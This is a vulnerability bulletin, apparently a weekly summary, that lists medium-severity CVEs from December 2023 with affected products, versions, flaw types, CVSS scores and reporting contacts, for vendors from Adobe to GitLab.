adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48604
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48605
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48606
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48607
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48609
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48610
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48611
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48612
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48613
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48614
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48615
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48616
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48617
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48618
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48619
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48620
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48621
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48622
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48623
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48624
psirt@adobe.com
adobe — indesign Adobe InDesign versions 19.0 (and earlier) and 17.4.2 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47076
psirt@adobe.com
adobe — indesign Adobe InDesign versions 19.0 (and earlier) and 17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47077
psirt@adobe.com
adobe — prelude Adobe Prelude versions 22.6 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-44362
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48636
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48637
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48638
psirt@adobe.com
adobe — substance_3d_stager Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47080
psirt@adobe.com
adobe — substance_3d_stager Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47081
psirt@adobe.com
alkacon — opencms Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the ‘Mercury’ template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session. 2023-12-13 6.1 CVE-2023-6379
cve-coordination@incibe.es
alkacon — opencms Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the ‘Mercury’ template. An attacker could create a specially crafted URL and send it to a specific user to redirect them to a malicious site and compromise them. Exploitation of this vulnerability is possible due to the fact that there is no proper sanitization of the ‘URI’ parameter. 2023-12-13 6.1 CVE-2023-6380
cve-coordination@incibe.es
ansible — ansible A template injection flaw was found in Ansible where a user’s controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce code injection when supplying templating data. 2023-12-12 6.6 CVE-2023-5764
secalert@redhat.com
apple — ios/ipados The issue was addressed with improved checks. This issue is fixed in iOS 17.2 and iPadOS 17.2. An attacker with physical access may be able to use Siri to access sensitive user data. 2023-12-12 4.6 CVE-2023-42897
product-security@apple.com
apple — ipados The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to break out of its sandbox. 2023-12-12 6.3 CVE-2023-42914
product-security@apple.com
apple — ipados This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. An app may be able to disclose kernel memory. 2023-12-12 5.5 CVE-2023-42884
product-security@apple.com
apple — ipados The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing an image may lead to arbitrary code execution. 2023-12-12 5.5 CVE-2023-42898
product-security@apple.com
apple — ipados A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to access sensitive user data. 2023-12-12 5.5 CVE-2023-42919
product-security@apple.com
apple — ipados This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, macOS Ventura 13.6.3, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to read sensitive location information. 2023-12-12 5.5 CVE-2023-42922
product-security@apple.com
apple — ipados This issue was addressed through improved state management. This issue is fixed in iOS 17.2 and iPadOS 17.2. Private Browsing tabs may be accessed without authentication. 2023-12-12 5.3 CVE-2023-42923
product-security@apple.com
apple — ipados A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2. An app may be able to access sensitive user data. 2023-12-12 5.5 CVE-2023-42927
product-security@apple.com
apple — macos An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to monitor keystrokes without user permission. 2023-12-12 5.5 CVE-2023-42891
product-security@apple.com
apple — macos This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access information about a user’s contacts. 2023-12-12 5.5 CVE-2023-42894
product-security@apple.com
apple — macos The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data. 2023-12-12 5.5 CVE-2023-42900
product-security@apple.com
apple — macos A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3. An app may be able to access sensitive user data. 2023-12-12 5.5 CVE-2023-42924
product-security@apple.com
apple — macos A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access protected user data. 2023-12-12 5.5 CVE-2023-42932
product-security@apple.com
apple — multiple_products The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. Processing an image may lead to a denial-of-service. 2023-12-12 5.5 CVE-2023-42883
product-security@apple.com
archerirm — archer Archer Platform 6.x before 6.13 P2 (6.13.0.2) contains an authenticated HTML content injection vulnerability. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 (6.14.0) is also a fixed release. 2023-12-12 5.4 CVE-2023-48642
cve@mitre.org
arduino — create-agent The Arduino Create Agent allows users to use the Arduino Create applications to upload code to any USB connected Arduino board directly from the browser. A vulnerability in versions prior to 1.3.6 affects the endpoint `/certificate.crt` and the way the web interface of the ArduinoCreateAgent handles custom error messages. An attacker that is able to persuade a victim into clicking on a malicious link can perform a Reflected Cross-Site Scripting attack on the web interface of the create agent, which would allow the attacker to execute arbitrary browser client side code. Version 1.3.6 contains a fix for the issue. 2023-12-13 6.3 CVE-2023-49296
security-advisories@github.com
arm — cortex-a77_firmware Cortex-A77 cores (r0p0 and r1p0) are affected by erratum 1508412 where software, under certain circumstances, could deadlock a core due to the execution of either a load to device or non-cacheable memory, and either a store exclusive or register read of the Physical Address Register (PAR_EL1) in close proximity. 2023-12-08 5.5 CVE-2023-34320
security@xen.org
asterisk — asterisk Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. 2023-12-14 4.9 CVE-2023-49294
security-advisories@github.com
aveva — edge An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts’ responses. 2023-12-16 5.3 CVE-2021-42794
cve@mitre.org
beckhoff — twincat/bsd The package authelia-bhf included in Beckhoff’s TwinCAT/BSD is prone to an open redirect that allows a remote unprivileged attacker to redirect a user to another site. This may have limited impact on integrity and solely affects authelia-bhf, the Beckhoff fork of authelia. 2023-12-14 4.3 CVE-2023-6545
info@cert.vde.com
bitcoin — bitcoin_core In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023. 2023-12-09 5.3 CVE-2023-50428
cve@mitre.org
caddyserver — caddy The caddy-geo-ip (aka GeoIP) middleware through 0.6.0 for Caddy 2, when trust_header X-Forwarded-For is used, allows attackers to spoof their source IP address via an X-Forwarded-For header, which may bypass a protection mechanism (trusted_proxy directive in reverse_proxy or IP address range restrictions). 2023-12-10 6.5 CVE-2023-50463
cve@mitre.org
canonical — ubuntu_server A feature in LXD (LP#1829071) affects the default configuration of Ubuntu Server, which allows privileged users in the lxd group to escalate their privilege to root without requiring a sudo password. 2023-12-12 5 CVE-2023-5536
security@ubuntu.com
cisco — adaptive_security_appliance_software A vulnerability in the AnyConnect SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to send packets with another VPN user’s source IP address. This vulnerability is due to improper validation of the packet’s inner source IP address after decryption. An attacker could exploit this vulnerability by sending crafted packets through the tunnel. A successful exploit could allow the attacker to send a packet impersonating another VPN user’s IP address. It is not possible for the attacker to receive return packets. 2023-12-12 4.3 CVE-2023-20275
ykramarz@cisco.com
ckan — ckan CKAN is an open-source data management system for powering data hubs and data portals. Starting in version 2.0.0 and prior to versions 2.9.10 and 2.10.3, when submitting a POST request to the `/dataset/new` endpoint (including either the auth cookie or the `Authorization` header) with a specially-crafted field, an attacker can create an out-of-memory error in the hosting server. To trigger this error, the attacker needs to have permissions to create or edit datasets. This vulnerability has been patched in CKAN 2.10.3 and 2.9.10. 2023-12-13 4.5 CVE-2023-50248
security-advisories@github.com
cloudflare — quiche quiche v. 0.15.0 through 0.19.0 was discovered to be vulnerable to unbounded queuing of path validation messages, which could lead to excessive resource consumption. QUIC path validation (RFC 9000 Section 8.2) requires that the recipient of a PATH_CHALLENGE frame responds by sending a PATH_RESPONSE. An unauthenticated remote attacker can exploit the vulnerability by sending PATH_CHALLENGE frames and manipulating the connection (e.g. by restricting the peer’s congestion window size) so that PATH_RESPONSE frames can only be sent at a slower rate than they are received, leading to storage of path validation data in an unbounded queue. Quiche versions greater than 0.19.0 address this problem. 2023-12-12 5.3 CVE-2023-6193
cna@cloudflare.com
codeastro — pos_and_inventory_management_system A vulnerability has been found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /accounts_con/register_account of the component User Creation Handler. The manipulation of the argument account_type with the input Admin leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247909 was assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6773
cna@vuldb.com
codeastro — pos_and_inventory_management_system A vulnerability was found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /accounts_con/register_account. The manipulation of the argument Username with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247910 is the identifier assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6774
cna@vuldb.com
collaboraoffice — richdocumentscode Collabora Online is a collaborative online office suite based on LibreOffice technology. Users of Nextcloud with `Collabora Online – Built-in CODE Server` app can be vulnerable to attack via proxy.php. The bug was fixed in Collabora Online – Built-in CODE Server (richdocumentscode) release 23.5.601. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-12-08 6.1 CVE-2023-49782
security-advisories@github.com
cube-js — cube Cube is a semantic layer for building data applications. Prior to version 0.34.34, it is possible to make the entire Cube API unavailable by submitting a specially crafted request to a Cube API endpoint. The issue has been patched in `v0.34.34` and it’s recommended that all users exposing Cube APIs to the public internet upgrade to the latest version to prevent service disruption. There is currently no workaround for older versions, and the recommendation is to upgrade. 2023-12-13 6.5 CVE-2023-50709
security-advisories@github.com
dedecms — dedecms DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component select_media_post_wangEditor.php. 2023-12-11 6.1 CVE-2023-49494
cve@mitre.org
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a path traversal vulnerability. A local high privileged attacker could potentially exploit this vulnerability to gain unauthorized read and write access to the OS files stored on the server filesystem, with the privileges of the running application. 2023-12-14 6.7 CVE-2023-44278
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A local high privileged attacker could potentially exploit this vulnerability to bypass security restrictions. Exploitation may lead to a system take over by an attacker. 2023-12-14 6.7 CVE-2023-44279
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an SQL Injection vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to the execution of certain SQL commands on the application’s backend database causing unauthorized read access to application data. 2023-12-14 4.3 CVE-2023-44284
security_alert@emc.com
dell — vapp_manager Dell vApp Manager, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability to read arbitrary files from the target system. 2023-12-14 4.9 CVE-2023-48661
security_alert@emc.com
dompdf — dompdf Dompdf is an HTML to PDF converter for PHP. When parsing SVG images Dompdf performs an initial validation to ensure that paths within the SVG are allowed. One of the validations is that the SVG document does not reference itself. However, prior to version 2.0.4, a recursive chain using two or more SVG documents is not correctly validated. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. php-svg-lib, when run in isolation, does not support SVG references for `image` elements. However, when used in combination with Dompdf, php-svg-lib will process SVG images referenced by an `image` element. Dompdf currently includes validation to prevent self-referential `image` references, but a chained reference is not checked. A malicious actor may thus trigger infinite recursion by chaining references between two or more SVG images. When Dompdf parses a malicious payload, it will crash after exceeding the allowed execution time or memory usage. An attacker sending multiple requests to a system can potentially cause resource exhaustion to the point that the system is unable to handle incoming requests. Version 2.0.4 contains a fix for this issue. 2023-12-13 5.3 CVE-2023-50262
security-advisories@github.com
elastic — elastic_agent An issue was discovered by Elastic whereby Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default. 2023-12-12 6.8 CVE-2023-6687
bressers@elastic.co
elastic — enterprise_search An issue was discovered by Elastic whereby the Documents API of App Search logged the raw contents of indexed documents at INFO log level. Depending on the contents of such documents, this could lead to the insertion of sensitive or private information in the App Search logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by changing the log level at which these are logged to DEBUG, which is disabled by default. 2023-12-12 6.8 CVE-2023-49923
bressers@elastic.co
elastic — multiple_products An issue was discovered by Elastic whereby Beats and Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Beats or Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Beats or Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default. 2023-12-12 6.8 CVE-2023-49922
bressers@elastic.co
elecom — wrc-x3000gsn_firmware OS command injection vulnerability in WRC-X3000GSN v1.0.2, WRC-X3000GS v1.0.24 and earlier, and WRC-X3000GSA v1.0.24 and earlier allows a network-adjacent attacker with an administrative privilege to execute an arbitrary OS command by sending a specially crafted request to the product. 2023-12-12 6.8 CVE-2023-49695
vultures@jpcert.or.jp
enalean — tuleap Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.2.99.103 of Tuleap Community Edition and prior to versions 15.2-4 and 15.1-8 of Tuleap Enterprise Edition, the names of releases are not properly escaped on the edition page of a release. A malicious user with the ability to create a FRS release could force a victim having write permissions in the FRS to execute uncontrolled code. Tuleap Community Edition 15.2.99.103, Tuleap Enterprise Edition 15.2-4, and Tuleap Enterprise Edition 15.1-8 contain a fix for this issue. 2023-12-11 5.4 CVE-2023-48715
security-advisories@github.com
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains the functions get_url_as_text and get_url_as_bytea that are publicly executable, thus permitting an authenticated user to read any file from the local filesystem or remote system regardless of that user’s permissions. 2023-12-12 6.5 CVE-2023-41114
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. When using UTL_ENCODE, an authenticated user can read any large object, regardless of that user’s permissions. 2023-12-12 6.5 CVE-2023-41115
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It permits an authenticated user to use DBMS_PROFILER to remove all accumulated profiling data on a system-wide basis, regardless of that user’s permissions. 2023-12-12 6.5 CVE-2023-41120
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to obtain information about whether certain files exist on disk, what errors if any occur when attempting to read them, and some limited information about their contents (regardless of permissions). This can occur when a superuser has configured one or more directories for filesystem access via CREATE DIRECTORY and adopted certain non-default settings for log_line_prefix and log_connections. 2023-12-12 4.3 CVE-2023-41113
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to refresh any materialized view, regardless of that user’s permissions. 2023-12-12 4.3 CVE-2023-41116
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Floating Point Exception via the function PeaksToHarmspect at wavegen.c. 2023-12-12 5.5 CVE-2023-49994
cve@mitre.org
evershop — evershop Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.5 allows a remote attacker to obtain sensitive information via a crafted request to the ProductGrid function in admin/productGrid/Grid.jsx. 2023-12-08 6.1 CVE-2023-46494
cve@mitre.org
evershop — evershop Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the sortBy parameter. 2023-12-08 6.1 CVE-2023-46495
cve@mitre.org
evershop — evershop Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.5 allows a remote attacker to obtain sensitive information via crafted scripts to the Admin Panel. 2023-12-08 6.1 CVE-2023-46499
cve@mitre.org
evershop — evershop Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the readDirSync function in fileBrowser/browser.js. 2023-12-08 5.3 CVE-2023-46493
cve@mitre.org
evershop — evershop Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the mkdirSync function in the folderCreate/createFolder.js endpoint. 2023-12-08 5.4 CVE-2023-46497
cve@mitre.org
fortinet — fortiadc An improper authorization vulnerability [CWE-285] in Fortinet FortiADC version 7.4.0 and before 7.2.2 may allow a low privileged user to read or backup the full system configuration via HTTP or HTTPS requests. 2023-12-13 5.4 CVE-2023-41673
psirt@fortinet.com
fortinet — fortisandbox An improper neutralization of input during web page generation (‘cross-site scripting’) in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 and 3.0.0 through 3.0.4 allows attacker to execute unauthorized code or commands via crafted HTTP requests in capture traffic endpoint. 2023-12-13 5.4 CVE-2023-41844
psirt@fortinet.com
fortinet — fortisandbox An improper neutralization of input during web page generation (‘cross-site scripting’) in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 allows attacker to execute unauthorized code or commands via crafted HTTP requests. 2023-12-13 5.4 CVE-2023-45587
psirt@fortinet.com
fortinet — fortiweb An improper output neutralization for logs in Fortinet FortiWeb 6.2.0 – 6.2.8, 6.3.0 – 6.3.23, 7.0.0 – 7.0.9, 7.2.0 – 7.2.5 and 7.4.0 may allow an attacker to forge traffic logs via a crafted URL of the web application. 2023-12-13 5.3 CVE-2023-46713
psirt@fortinet.com
franklin-electric — system_sentinel_anyware Franklin Fueling Systems System Sentinel AnyWare (SSA) version 1.6.24.492 is vulnerable to Open Redirect. The ‘path’ parameter of the prefs.asp resource allows an attacker to redirect a victim user to an arbitrary web site using a crafted URL. 2023-12-08 6.1 CVE-2023-48928
cve@mitre.org
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag. 2023-12-15 5.7 CVE-2023-6051
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. 2023-12-15 4.3 CVE-2023-3904
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API. 2023-12-15 4.3 CVE-2023-5061
cve@gitlab.com
